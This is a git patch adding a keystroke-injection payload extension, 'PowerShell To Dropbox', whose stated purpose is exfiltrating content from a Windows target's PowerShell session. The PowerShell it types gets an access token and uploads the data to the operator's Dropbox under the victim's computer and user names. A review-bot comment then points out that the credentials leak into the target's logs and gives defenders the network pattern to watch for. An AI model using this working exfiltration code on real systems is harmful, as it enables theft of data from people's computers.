From f8a43715524cc6c32796c404e65e4d8e1871fae1 Mon Sep 17 00:00:00 2001
From: Julien M <157210867+PlumpyTurkey@users.noreply.github.com>
Date: Sun, 2 Jun 2024 13:21:39 +0200
Subject: [PATCH] Update "PowerShell To Dropbox" Extension
---
.../community/POWERSHELL_TO_DROPBOX | 43 +++++++++++++++++++
1 file changed, 43 insertions(+)
create mode 100644 payloads/extensions/community/POWERSHELL_TO_DROPBOX
diff --git a/payloads/extensions/community/POWERSHELL_TO_DROPBOX b/payloads/extensions/community/POWERSHELL_TO_DROPBOX
new file mode 100644
index 0000000..8fe6ef4
--- /dev/null
+++ b/payloads/extensions/community/POWERSHELL_TO_DROPBOX
@@ -0,0 +1,43 @@
+EXTENSION POWERSHELL_TO_DROPBOX
+ REM_BLOCK DOCUMENTATION
+ Title: PowerShell To Dropbox
+ Author: PlumpyTurkey
+ Description: This extension allows you to exfiltrate content available from PowerShell to a file in your Dropbox.
+ Target: Windows 10, 11
+ Version: 1.1
+ END_REM
+
+ REM Required options:
+ DEFINE #PTD_CONTENT $Content
+ DEFINE #PTD_REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ DEFINE #PTD_APP_KEY XXXXXXXXXXXXXXX
+ DEFINE #PTD_APP_SECRET XXXXXXXXXXXXXXX
+
+ REM Advanced options:
+ DEFINE #PTD_OUTPUT_FOLDER Exfiltrated-content
+ DEFINE #PTD_OUTPUT_FILE [${env:COMPUTERNAME}-${env:USERNAME}].txt
+
+ FUNCTION PTD_SEND()
+ STRING_POWERSHELL
+ try {
+ Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
+ "Authorization" = "Bearer $((
+ Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
+ "Content-Type" = "application/x-www-form-urlencoded"
+ } -Body @{
+ "grant_type" = "refresh_token";
+ "refresh_token" = #PTD_REFRESH_TOKEN;
+ "client_id" = #PTD_APP_KEY;
+ "client_secret" = #PTD_APP_SECRET
+ }
+ ).access_token)";
+ "Content-Type" = "application/octet-stream";
+ "Dropbox-API-Arg" = "{""path"":""/#PTD_OUTPUT_FOLDER/#PTD_OUTPUT_FILE"",""mode"":""add"",""autorename"":true,""mute"":false}"
+ } -Body #PTD_CONTENT | Out-Null
+ }
+ catch {
+ Write-Host "An error occurred: $_"
+ }
+ END_STRING
+ END_FUNCTION
+END_EXTENSION
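Review bot: The `REM_BLOCK DOCUMENTATION` header does not say that `#PTD_REFRESH_TOKEN`, `#PTD_APP_KEY` and `#PTD_APP_SECRET` are placed inside the `STRING_POWERSHELL` body of `PTD_SEND`, so a long-lived refresh token and the app secret are typed in clear text into the target's PowerShell session. From there they will likely be recorded in PSReadLine history and, where enabled, in script-block logging, so anyone with access to the host or its logs can recover credentials for the operator's Dropbox app. I would add a line to the documentation block such as `Note: the refresh token and app secret are typed in clear text on the target; use a Dropbox app restricted to its own app folder and revoke the token after the engagement.` For defenders reading this file, a PowerShell process that posts to `api.dropboxapi.com/oauth2/token` and then to `content.dropboxapi.com/2/files/upload` is the observable pattern this extension produces.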